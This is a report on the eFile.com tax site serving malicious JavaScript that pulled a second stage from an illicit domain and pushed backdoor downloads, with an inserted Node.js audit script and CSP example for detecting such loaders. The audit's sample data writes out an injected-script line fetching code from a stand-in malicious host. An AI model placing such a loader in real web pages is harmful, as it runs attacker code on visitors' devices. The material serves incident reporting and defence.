eFile.com, an IRS-approved tax return software, found to be distributing JS malware

Multiple users and researchers have reported that eFile.com, tax return software authorized by the IRS, has been caught serving malware. The malicious JavaScript file in question is called ‘popper.js’ and was being loaded by almost every page of eFile.com until at least April 1st. It contained code that attempted to load JavaScript returned by an illicit domain, infoamanewonliag[.]online. The Math.random() call at the end of the code was likely a cache-busting measure, ensuring the browser fetched a fresh copy of the malware rather than a cached one. As of today, the file is no longer seen serving the malicious code.
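The loader pattern described above (a script element pointing at an off-site host, with Math.random() appended to defeat caching) is something a site operator can audit for statically. The following is an added example, not code from eFile.com, from the researchers' report or from the real ‘popper.js’: a small Node.js audit that scans JavaScript source for URL literals whose host is outside an allowlist, notes whether the URL is fed to a script-loading sink and whether a cache-busting value is appended, and builds the matching Content-Security-Policy `script-src` directive. The allowlisted hosts, the `.invalid` domain and the `SAMPLE` source are all constructed placeholders.

```javascript
// Added example (not eFile.com's or the report's code). Static audit of JavaScript
// source for the injection pattern described in the article. Hosts, the placeholder
// domain and SAMPLE are constructed assumptions, not values from the incident.

const ALLOWED_HOSTS = new Set(['www.example.com', 'cdn.example.com']); // assumed first-party hosts

// Absolute URL string literals (http, https or protocol-relative) in any quote style.
const URL_LITERAL_RE = /["'`](?:https?:)?\/\/([a-z0-9.-]+)(?::\d+)?[^"'`]*["'`]/gi;
// Script-loading sinks and the cache-busting idiom, checked in the statement around each URL.
const SCRIPT_SINK_RE = /createElement\(\s*["']script["']\s*\)|\.src\s*=|appendChild/;
const CACHE_BUST_RE = /Math\.random\(\)|Date\.now\(\)|new Date\(\)/;

// Return the statement (bounded by the nearest ';' or newline) surrounding offset `pos`.
function statementAround(source, pos) {
  const start = Math.max(source.lastIndexOf(';', pos), source.lastIndexOf('\n', pos)) + 1;
  let end = source.indexOf(';', pos);
  if (end === -1) end = source.length;
  return source.slice(start, end).trim();
}

// Audit `source`: one finding per URL literal whose host is not on the allowlist.
function auditScript(source, allowedHosts = ALLOWED_HOSTS) {
  const findings = [];
  const re = new RegExp(URL_LITERAL_RE.source, URL_LITERAL_RE.flags); // fresh state per call
  let m;
  while ((m = re.exec(source)) !== null) {
    const host = m[1].toLowerCase();
    if (allowedHosts.has(host)) continue;
    const stmt = statementAround(source, m.index);
    const lineNo = source.slice(0, m.index).split('\n').length;
    const scriptSink = SCRIPT_SINK_RE.test(stmt); // URL assigned to a script src / appended node
    const cacheBust = CACHE_BUST_RE.test(stmt);   // random or time value appended to the URL
    findings.push({
      line: lineNo,
      host,
      scriptSink,
      cacheBust,
      severity: scriptSink && cacheBust ? 'high' : scriptSink ? 'medium' : 'low',
      statement: stmt,
    });
  }
  return findings;
}

// Mitigation: a CSP script-src that permits only the allowlisted hosts. A browser
// enforcing it refuses the off-site second-stage fetch regardless of the query string.
function cspScriptSrc(allowedHosts = ALLOWED_HOSTS) {
  const hosts = [...allowedHosts].sort().map((h) => `https://${h}`);
  return `script-src 'self' ${hosts.join(' ')}`;
}

// Constructed sample in the shape the article describes (not the real popper.js).
const SAMPLE = [
  "var s = document.createElement('script');",
  "s.src = 'https://malicious-placeholder.invalid/loader.js?' + Math.random();",
  'document.head.appendChild(s);',
  "var p = document.createElement('script');",
  "p.src = 'https://cdn.example.com/popper.min.js';",
  'document.head.appendChild(p);',
].join('\n');

console.log(JSON.stringify(auditScript(SAMPLE), null, 2));
console.log('Content-Security-Policy:', cspScriptSrc());
```

Run with `node audit.js`. The audit reports the `.invalid` host at line 2 as high severity (script sink plus cache-buster) and skips the allowlisted CDN. Note the limit of the CSP shown: `'self'` still permits a first-party file such as ‘popper.js’ to run if it has been modified on the server, so the policy blocks the off-site second stage but not the tampered loader itself; catching that requires integrity monitoring of the served files.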

On March 17th, multiple eFile.com users suspected that the website had been “hijacked,” which researchers later confirmed after spotting an additional file, ‘update.js’, associated with the attack. The ‘update.js’ file attempted to prompt users to download a next-stage payload, chosen according to whether they were using Chrome or Firefox; antivirus products have already flagged these payloads as trojans. The payload is a backdoor that allows the threat actor to remotely access an infected device. While it is only a basic backdoor, it has enough functionality to give full access to a device, giving the threat actor initial access to a corporate network for further attacks. It is still unclear whether the attack successfully infected any eFile.com visitors and customers.